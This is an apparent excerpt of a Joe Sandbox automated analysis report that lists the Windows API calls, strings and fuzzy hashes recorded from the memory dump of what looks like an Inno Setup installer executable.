                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID:
                                                              • API String ID: 2087232378-0
                                                              • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                              • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                              • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                              • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                              APIs
                                                              • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                              • String ID:
                                                              • API String ID: 1658689577-0
                                                              • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                              • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                              • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                              • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                              • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                              • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                              • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                              • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                              • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                              • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                              • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                              • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                              • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                              • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                              • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                              • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                              APIs
                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage
                                                              • String ID:
                                                              • API String ID: 1306739567-0
                                                              • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                              • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                              • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                              • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                              APIs
                                                              • SetEndOfFile.KERNEL32(?,02118000,0040AA59,00000000), ref: 004076B3
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLast
                                                              • String ID:
                                                              • API String ID: 734332943-0
                                                              • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                              • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                              • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                              • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                              APIs
                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                              • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                              • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                              • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                              APIs
                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                              • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                              • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                              • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                              APIs
                                                              • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharPrev
                                                              • String ID:
                                                              • API String ID: 122130370-0
                                                              • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                              • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                              • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
APIs
• VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
APIs
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
Strings
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
APIs
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
• SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• GetSystemTime.KERNEL32(?), ref: 004026CE
Similarity
• API ID: SystemTime
• String ID:
• API String ID: 2656138-0
APIs
• GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
Strings
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• API String ID: 4190037839-2401316094
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
• GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
• GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
• GetLastError.KERNEL32(000000F5), ref: 00403C1E
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
  • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
Strings
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
APIs
• RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
• LocalFree.KERNEL32(005AA360,00000000,00401AB4), ref: 00401A1B
• VirtualFree.KERNEL32(?,00000000,00008000,005AA360,00000000,00401AB4), ref: 00401A3A
• LocalFree.KERNEL32(005AB360,?,00000000,00008000,005AA360,00000000,00401AB4), ref: 00401A79
• RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
• RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                              Similarity
                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                              • String ID:
                                                              • API String ID: 3782394904-0
                                                              • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                              • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                              • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                              • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                              APIs
                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                              • ExitProcess.KERNEL32 ref: 00403DE5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ExitMessageProcess
                                                              • String ID: Error$Runtime error at 00000000$9@
                                                              • API String ID: 1220098344-1503883590
                                                              • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                              • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                              • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                              • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 262959230-0
                                                              • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                              • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                              • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                              • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                              • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CommandHandleLineModule
                                                              • String ID: 8&Y$U1hd.@
                                                              • API String ID: 2123368496-2874236510
                                                              • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                              • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                              • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                              • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: QueryValue
                                                              • String ID: )q@
                                                              • API String ID: 3660427363-2284170586
                                                              • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                              • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                              • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                              • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                              APIs
                                                              • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                              Strings
                                                              • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                              • Setup, xrefs: 00409CAD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                              • API String ID: 2030045667-3271211647
                                                              • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                              • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                              • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                              • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                              APIs
                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                              • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                              • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmp
